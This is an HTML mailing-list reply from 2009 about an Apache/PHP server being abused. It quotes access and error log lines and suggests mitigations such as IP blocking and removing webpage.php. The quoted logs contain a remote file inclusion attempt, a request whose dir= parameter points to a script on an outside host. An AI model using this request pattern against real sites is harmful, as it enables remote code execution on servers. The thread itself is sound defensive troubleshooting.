members.php isn't. But, it would appear that webpage.php is (as it returned 200). Who owns webpage.php? How did the page get there? Have you tried the exact same request? It should probably be removed or debugged.<br>
<br>- You could block by IP or range<br>- remove webpage.php<br>- disallow php includes (I forget the php.ini directive)<br><br><div class="gmail_quote">On Mon, Jun 29, 2009 at 4:40 PM, Ben Alexander <span dir="ltr"><<a href="mailto:ben-ale@bensbox.com">ben-ale@bensbox.com</a>></span> wrote:<br>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"><div>Every now and then some IP address from Asia or other place hits our web server and is utilizing some PHP or mod_rewrite perhaps bug to proxy themselves to another website perhaps and use a lot of bandwidth, but only our outgoing it seems.</div>
<div><br></div><div>Here is an example from access_log of this (members.php is not a valid PHP page on the site):</div><div><br></div><div><div>80.93.50.112 - - [27/Jun/2009:01:35:37 -0400] "GET //members.php?act=view&p=passwd&dir=<a href="http://lpkpm.com/lib/fatal1.txt??" target="_blank">http://lpkpm.com/lib/fatal1.txt??</a>?? HTTP/1.1" 404 16942 "-" "Mozilla/5.0" "-"</div>
<div>80.93.50.112 - - [27/Jun/2009:01:35:39 -0400] "GET /webpage.php//members.php?act=view&p=passwd&dir=<a href="http://lpkpm.com/lib/fatal1.txt??" target="_blank">http://lpkpm.com/lib/fatal1.txt??</a>?? HTTP/1.1" 200 210484729 "-" "Mozilla/5.0" "-"</div>
<div><br></div></div><div>When this happens, there are hundreds of megs of log lines like this in error_log:</div><div><br></div><div><div>[Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] PHP Warning: virtual() [<a href='function.virtual'>function.virtual</a>]: Unable to include 'footer.php' - error finding URI in /htdocs/<a href="http://website.com/webpage.php" target="_blank">website.com/webpage.php</a> on line 93</div>
<div><br></div></div><div>[Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] Request exceeded the limit of 10 subrequest nesting levels due to probable confguration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.</div>
<div><br></div><div><br></div><div>Any idea how to prevent this?</div><div><br></div><div>Thanks,</div><div>Ben</div>
<br>_______________________________________________<br>
Ale mailing list<br>
<a href="mailto:Ale@ale.org">Ale@ale.org</a><br>
<a href="http://mail.ale.org/mailman/listinfo/ale" target="_blank">http://mail.ale.org/mailman/listinfo/ale</a><br>
<br></blockquote></div><br>